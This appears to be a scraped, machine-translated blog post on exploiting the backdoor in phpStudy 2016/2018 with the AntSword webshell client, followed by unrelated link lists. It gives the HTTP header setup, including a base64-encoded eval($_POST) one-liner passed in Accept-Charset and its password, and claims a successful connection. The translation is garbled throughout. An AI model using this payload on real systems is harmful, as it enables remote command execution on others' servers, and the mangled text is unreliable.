Chinese sword without the use of ant file phpstudy backdoor way to connect

Others 2019-09-28 14:20:26 views: null

0x01 Description

Phpstudy is a program integrated PHP debugging environment package, integrates the latest Apache, PHP, phpMyAdmin, ZendOptimizer variety of software and other one-time installation, no configuration out of the box. Due to its free and convenient features, in the country has nearly a million PHP language learners, developers user.

Backdoor Name: Phpstudy back door

Threat Level: Severe

Sphere of influence: Phpstudy 2016, phpstudy2018

Backdoor type: C & C, command execution

The use of difficulty: easy

0x02 reproducible

The use of tools: China ant sword

phpstudy：2016 PHP-5.4.45

Chinese sword without the use of ant file phpstudy backdoor way to connect

Encoding-the Accept: gzip, the deflate 
the Accept-Charset: command base64 encryption execution of 
sentence Trojan: ZXZhbCgkX1BPU1RbZ10pOw == 
Password: g

Configuring HTTP message header

Chinese sword without the use of ant file phpstudy backdoor way to connect

connection succeeded

Chinese sword without the use of ant file phpstudy backdoor way to connect

Guess you like

Origin www.cnblogs.com/0daybug/p/11601391.html

Chinese sword without the use of ant file phpstudy backdoor way to connect

phpstudy backdoor rce use batch script

Chinese Ant Sword Installation Tutorial

phpstudy backdoor vulnerability reproducibility

phpStudy backdoor exploits reproducibility

phpstudy backdoor interactive shell

How phpStudy backdoor detection and repair

[Network Security] File Upload Vulnerabilities and China Ant Sword Installation

About one kind of ant sword / knife can not connect shell can try the solution

The easiest way to connect two computers, realize file transfer, very fast

How to use plsql to connect to oracle without installing oracle client

Use ant achieve three MyEclipse in the way packaged jar

Is there a cleaner way to use Optional here without returning "NA" in three places?

Is there a way to use a repository without applying repository base class?

[Ant Design of Vue] The use of v-ant-ref, another way to get component instances

In fact, Apple knows that it cannot do without Chinese manufacturing, so it quietly left a way for itself

The use of phpstudy client

connect to oracle without listener

Simple use of SSZipArchive, get the file name without unzipping

Use input file to realize preview without uploading server selection

Use input file to realize preview without uploading server selection

oracle convenient way to connect

Is there a way to run a -.jar file (created with javaFx) without displaying anything(GUI, progressbar, ...)?

Website backdoor file (Webshell) analysis notes

Try uploading a malicious backdoor file metasploit

Ant sword Windows installation tutorial

ANT use

International students use ChatGPT in this way, which can improve efficiency without relying on it

China Chinese way

Use two-way NAT to connect two organizations with conflicting private network addresses.

Recommended

Ranking

Business team with OKR removed a stumbling block on the road of success

Huihai Semiconductor Boost LED Constant Current Driver Chip H6911 Solution

Leetcode 128. Longest Consecutive Sequence (Hash + Optimization)

JVM学习笔记（六）JMM和Volatile

java review-Calendar class

LeetCode Brushing Diary Hash Table I

Spring Cloud Config uses SVN as configuration source

__enter __, __ exit__ difference

Remove null values in String array

Basic difference --- child burst suffix array yxs bare title board title monotonous simple application stack string study to understand problems

Daily

More

2024-07-29(0)

2024-07-28(0)

2024-07-27(0)

2024-07-26(0)

2024-07-25(0)

2024-07-24(0)

2024-07-23(0)

2024-07-22(0)

2024-07-21(0)

2024-07-20(0)